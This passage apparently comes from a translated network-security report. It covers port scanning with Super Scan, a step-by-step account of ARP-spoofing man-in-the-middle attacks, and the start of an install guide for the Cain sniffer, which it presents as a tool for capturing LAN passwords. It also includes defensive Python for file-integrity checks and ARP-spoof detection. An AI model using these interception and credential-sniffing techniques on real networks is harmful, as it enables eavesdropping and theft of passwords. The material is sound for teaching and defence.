Following the rules listed above helps protect the web server better, and the network administrator no longer has to suffer headaches and worries about the security of the web server and of information across the whole system.
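The integrity checks for passwd and other system files recommended above can be scripted; the following is an added example (not from the original report) that records SHA-256 baselines and reports created, deleted and modified files, using a constructed temporary directory in place of /etc.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def file_digest(path):
    """SHA-256 of a file, read in chunks so large files need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def take_baseline(paths):
    """Record the digest of each monitored file; None marks a file that does
    not exist yet, so its later appearance is reported as well."""
    return {str(p): (file_digest(p) if os.path.exists(p) else None) for p in paths}


def check_integrity(baseline):
    """Compare the current files against the baseline and return a list of
    (path, event) pairs, event being 'created', 'deleted' or 'modified'."""
    events = []
    for path, old_digest in baseline.items():
        exists = os.path.exists(path)
        if old_digest is None and exists:
            events.append((path, "created"))
        elif old_digest is not None and not exists:
            events.append((path, "deleted"))
        elif old_digest is not None and file_digest(path) != old_digest:
            events.append((path, "modified"))
    return events


def demo():
    """Constructed scenario in a temporary directory standing in for /etc:
    a uid-0 line is appended to passwd, hosts is deleted and shadow appears."""
    root = Path(tempfile.mkdtemp())
    passwd, hosts, shadow = root / "passwd", root / "hosts", root / "shadow"
    passwd.write_text("root:x:0:0:root:/root:/bin/bash\n"
                      "www-data:x:33:33::/var/www:/usr/sbin/nologin\n")
    hosts.write_text("127.0.0.1 localhost\n")
    baseline = take_baseline([passwd, hosts, shadow])

    with passwd.open("a") as f:                     # unauthorized change
        f.write("newadmin:x:0:0::/:/bin/bash\n")
    hosts.unlink()
    shadow.write_text("root:*:19000:0:99999:7:::\n")
    return sorted(event for _, event in check_integrity(baseline))


if __name__ == "__main__":
    print(demo())  # ['created', 'deleted', 'modified']
```

A scheduled job that calls check_integrity and hands a non-empty result to a mailer (for example smtplib) provides the e-mail alert the text asks for.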

* Super Scan:

We will check information on the network with the Super Scan tool. More specifically, we use Super Scan to scan one IP address and identify weaknesses through which the system could be penetrated, via the ports the software reports as open.

Steps:

- After downloading Super Scan, run the program as shown in the figure below:
- The program can scan.
- Hostname/IP: enter the IP address to scan.
- Or you can also scan a whole IP range:
- Start IP: the first IP address
- End IP: the last IP address

To start scanning, click the Start button in the bottom-left corner.

Super Scan also has other options such as:


- Host and Services Discovery: change the ports to scan on the IP, or use the built-in port list.
- Scan Options: change the host and service parameters.
- Tools: functions for checking and looking up information about an IP address or domain (Ping, whois, HTTP Header request, ...).
- Windows Enumeration: extended information about an IP address or domain (NetBIOS, MAC address, Workstation, ...).

Example: scanning the IP 210.245.31.17 gives the result shown in the figure below:

Here, IP 210.245.31.17 has 6 ports open in total: 5 TCP and 1 UDP.

According to the listing, the open TCP ports are:

- 21: FTP


- 23: Telnet
- 80: web
- 443: SSL
- 8001: this port is opened by a Trojan

To see the results in more detail, click View HTML Results.

From here we can identify the ports a hacker could abuse to break in and take measures to secure them.

- Some other features of Super Scan in the Tools section: ping, tracert or whois of a domain.

In the figure above, a tracert of the domain www.itsea.net gave the following information:

- The domain has IP 207.210.81.150 and is 16 hops away; the server runs Linux with Apache 1.3.36 (unix) and OpenSSL 0.9.7a.
- There are also several other functions that thoroughly exploit information about


- This is a very dangerous form of attack, called Man In The Middle. In this case it is like wiretapping: the session between the sending and receiving machines proceeds normally, so the user has no idea that they are under attack.

b. Outline of how it works:

- On the same network, when Host A and Host B want to communicate, the packets are passed down to the data link layer for encapsulation, and the hosts must put the source MAC and destination MAC into the frame. So before data transmission, the hosts must ask each other for their MAC addresses.
- If Host A starts the MAC lookup first, it broadcasts an ARP request to all hosts asking for Host B's MAC; at that point Host B has Host A's MAC, and then Host B alone replies to Host A with Host B's MAC (ARP reply).
- A Host C continuously sends ARP replies to Host A and Host B carrying Host C's MAC address, but with the IP addresses of Host A and Host B. Host A now believes machine B has MAC C. Thus all packets Host A sends to Host B are delivered to Host C, and Host B's replies to Host A also go to Host C. If Host C turns on forwarding, Host A and Host B have no idea they are victims of an ARP attack.

- Example:

We have a model with the following hosts:

Attacker: the hacker's machine used for the ARP attack
IP: 10.0.0.11
MAC: 0000.0000.1011

Server: the victim machine
IP: 10.0.0.12
MAC: 0000.0000.1012

HostA
IP: 10.0.0.13
MAC: 0000.0000.1013

- First, HostA wants to send data to the Server and needs the Server's MAC address to communicate. HostA broadcasts an ARP Request to all machines in the LAN asking which MAC address belongs to IP 10.0.0.12 (the Server's IP).
- Both the Attacker and the Server receive the ARP Request, but only the Server sends an ARP Reply back to HostA. The ARP Reply carries the Server's IP 10.0.0.12 and MAC 0000.0000.1012.
- HostA receives the ARP Reply from the Server, learns that the Server's MAC address is 0000.0000.1012 and starts sending data to the Server. The Attacker cannot see the data exchanged between HostA and the Server.

The Attacker now wants to carry out an ARP attack against the Server: the Attacker wants to copy and secretly read every packet HostA sends to the Server.

- The Attacker continuously sends ARP Replies carrying the Server's IP 10.0.0.12 but the Attacker's MAC address 0000.0000.1011.
- HostA receives the ARP Reply and believes that the Server's IP 10.0.0.12 has MAC address 0000.0000.1011. HostA stores this in its ARP cache and proceeds with the connection.
- From now on, all information and data HostA sends to the machine with IP 10.0.0.12 (the Server) is sent to MAC address 0000.0000.1011, the Attacker's machine.
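A defender watching the LAN can recognize the sequence described above. Here is an added example (not from the original report) that runs two checks over constructed ARP replies using the IP and MAC values of the model: an IP whose MAC changes, and one MAC announced for several IPs.

```python
from collections import defaultdict

# Constructed ARP replies as seen by a monitor on the LAN of the example above,
# in arrival order: (sender IP, sender MAC). The first two are genuine; the
# rest are the Attacker (0000.0000.1011) claiming the Server's and HostA's IPs.
SAMPLE_REPLIES = [
    ("10.0.0.12", "0000.0000.1012"),   # Server's genuine ARP Reply
    ("10.0.0.13", "0000.0000.1013"),   # HostA's genuine ARP Reply
    ("10.0.0.12", "0000.0000.1011"),   # forged: Server's IP, Attacker's MAC
    ("10.0.0.12", "0000.0000.1011"),   # forged, repeated
    ("10.0.0.13", "0000.0000.1011"),   # forged: HostA's IP, Attacker's MAC
]

# Static bindings the administrator trusts (assumption: here only the Server).
STATIC_BINDINGS = {"10.0.0.12": "0000.0000.1012"}


def detect_arp_spoofing(replies, static_bindings=None):
    """Return the alerts raised while processing ARP replies in order.

    Two signals of the attack described above:
    - 'mac-change': an IP already bound to one MAC is announced with another,
    - 'multi-ip':   one MAC is announced for more than one IP address.
    The first binding seen for an unknown IP is trusted, as a real ARP cache
    would; static bindings are never overwritten."""
    table = dict(static_bindings or {})          # ip -> mac currently believed
    ips_for_mac = defaultdict(set)
    for ip, mac in table.items():
        ips_for_mac[mac].add(ip)
    alerts = []

    for ip, mac in replies:
        known = table.get(ip)
        if known is None:
            table[ip] = mac
        elif known != mac:
            alert = ("mac-change", ip, known, mac)
            if alert not in alerts:
                alerts.append(alert)
        ips_for_mac[mac].add(ip)
        if len(ips_for_mac[mac]) > 1:
            alert = ("multi-ip", mac, tuple(sorted(ips_for_mac[mac])))
            if alert not in alerts:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_REPLIES, STATIC_BINDINGS):
        print(alert)
```

Static ARP entries for critical hosts, as in STATIC_BINDINGS, are also a mitigation: the victim's cache then ignores the forged replies rather than merely logging them.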


3. Using the CAIN software

- Cain is an effective sniffer program available today. Its features allow the sniffer to obtain confidential information on a LAN such as e-mail passwords and passwords for the ftp and telnet services, ...

a. Hardware requirements:

10 MB of free disk space
Windows 2000/2003/XP operating system
WinPcap must be installed

b. Installation:

- Choose Next.


- Choose Next.
- Choose Finish.

During installation, Cain requires the WinPcap library to be installed as well.
